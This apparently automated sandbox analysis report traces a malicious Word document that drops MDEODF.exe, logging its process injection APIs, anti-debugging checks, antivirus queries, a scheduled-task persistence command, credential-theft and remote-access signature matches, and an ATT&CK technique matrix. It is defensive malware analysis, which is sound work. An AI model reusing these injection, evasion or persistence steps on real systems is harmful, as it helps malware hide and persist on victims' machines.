                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 4B80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 5B80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 2400000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 300000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 2130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 5F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 300000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 2410000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 4D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 4AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 5D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 6D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 6F90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 7F90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 8F90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: A230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: B230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: B6C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: C6C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 300000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 20D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 40D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 2300000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 1F40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 21A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 420000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 2120000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 9E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 5A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 5BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 6BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 6DF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 7DF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 5BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 7DF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 1C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 2450000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 420000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 1C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 23B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 810000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 1C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 21F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 480000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeWindow / User API: threadDelayed 676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeWindow / User API: threadDelayed 9200Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3784Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3832Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3872Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3920Thread sleep count: 676 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3920Thread sleep count: 9200 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3872Thread sleep time: -220000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 1972Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe TID: 3932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe TID: 3976Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe TID: 4008Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\taskeng.exe TID: 3152Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3312Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 2140Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 1216Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs.Net Code: _200E_206A_206B_206E_200F_206E_200E_202E_200F_200F_202E_206F_202A_206D_202D_200E_206B_206A_200D_206B_206D_206F_202B_200F_202B_200C_206A_206C_206B_200B_206A_206C_202C_200D_202E_206B_202B_202D_202B_202E contains injection code
                      Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs.Net Code: _202B_202A_202C_200D_200F_202D_202D_206E_200B_200C_200B_206E_200B_200E_202B_200D_200C_200B_200C_206A_202D_206D_206B_206F_200E_206A_200D_202B_206E_206C_200E_202C_206E_200E_202D_206B_202C_202A_200E_200F_202E contains injection code
                      Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs.Net Code: _206B_206C_200F_200B_206B_206E_202A_200E_202C_202E_202A_202D_206F_200B_200B_206E_206B_206E_206E_202E_202C_202B_202E_202C_206F_200D_202A_206D_202C_206A_200B_202E_206A_206F_206B_200F_202A_206A_200C_202A_202E contains injection code
                      Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.csReference to suspicious API methods: _200E_202B_202C_206C_202C_206F_202D_206D_206A_206A_202C_202D_206B_202A_202E_202D_200D_202A_206A_202B_202B_202A_206C_200B_202C_202E_202D_206F_206B_206C_206F_202E_206C_200F_206B_202B_202B_206D_200D_202D_202E<_206A_202B_202E_206C_206C_206F_200C_206A_206C_206E_200E_206C_206C_200B_202E_202A_206B_202B_200D_206C_202E_200B_200B_202C_200F_206A_206A_206F_206C_202E_202C_202E_202A_206B_206C_202A_206E_202C_206E_202D_202E>("kernel32", "VirtualAllocEx")
                      Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.csReference to suspicious API methods: _200E_202B_202C_206C_202C_206F_202D_206D_206A_206A_202C_202D_206B_202A_202E_202D_200D_202A_206A_202B_202B_202A_206C_200B_202C_202E_202D_206F_206B_206C_206F_202E_206C_200F_206B_202B_202B_206D_200D_202D_202E<_206D_202E_206F_200F_200F_206F_200B_206F_202C_200D_202E_202E_202D_206D_202E_200D_206C_202B_206B_206C_202B_202C_206A_206E_202A_202E_206B_200D_200E_206B_206D_206C_200D_202A_206A_206B_202A_200F_202B_206C_202E>("ntdll", "NtWriteVirtualMemory")
                      Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.csReference to suspicious API methods: _200E_202B_202C_206C_202C_206F_202D_206D_206A_206A_202C_202D_206B_202A_202E_202D_200D_202A_206A_202B_202B_202A_206C_200B_202C_202E_202D_206F_206B_206C_206F_202E_206C_200F_206B_202B_202B_206D_200D_202D_202E<_202D_206B_200B_200F_200D_206B_206B_206E_200F_206F_202C_202D_200B_200C_200C_202C_202D_202B_206F_202D_200F_202D_202E_206A_200B_202E_206D_200D_200C_202C_202A_206F_206E_200E_202E_202C_200B_200E_202D_200E_202E>("ntdll", "NtSetContextThread")
                      Source: yIla7SeJ6r.docOLE indicator, VBA stomping: true
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /FJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJump to behavior
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 8.2.MDEODF.exe.2419b5c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.MDEODF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.MDEODF.exe.201a318.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.MDEODF.exe.201a318.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.380210454.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.393953865.0000000002207000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.375878692.00000000020F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3884, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3168, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 8.2.MDEODF.exe.2419b5c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.MDEODF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.MDEODF.exe.201a318.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.MDEODF.exe.201a318.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.380210454.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.393953865.0000000002207000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.375878692.00000000020F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3884, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MDEODF.exe PID: 3168, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information52
                      Scripting
                      Valid Accounts1
                      Windows Management Instrumentation
                      52
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      OS Credential Dumping1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      2
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      Obfuscated Files or Information
                      211
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory14
                      System Information Discovery
                      Remote Desktop ProtocolData from Removable Media11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts33
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      1
                      Scheduled Task/Job
                      3
                      Obfuscated Files or Information
                      Security Account Manager12
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      Login Hook12
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets41
                      Virtualization/Sandbox Evasion
                      SSHKeylogging213
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                      Virtualization/Sandbox Evasion
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
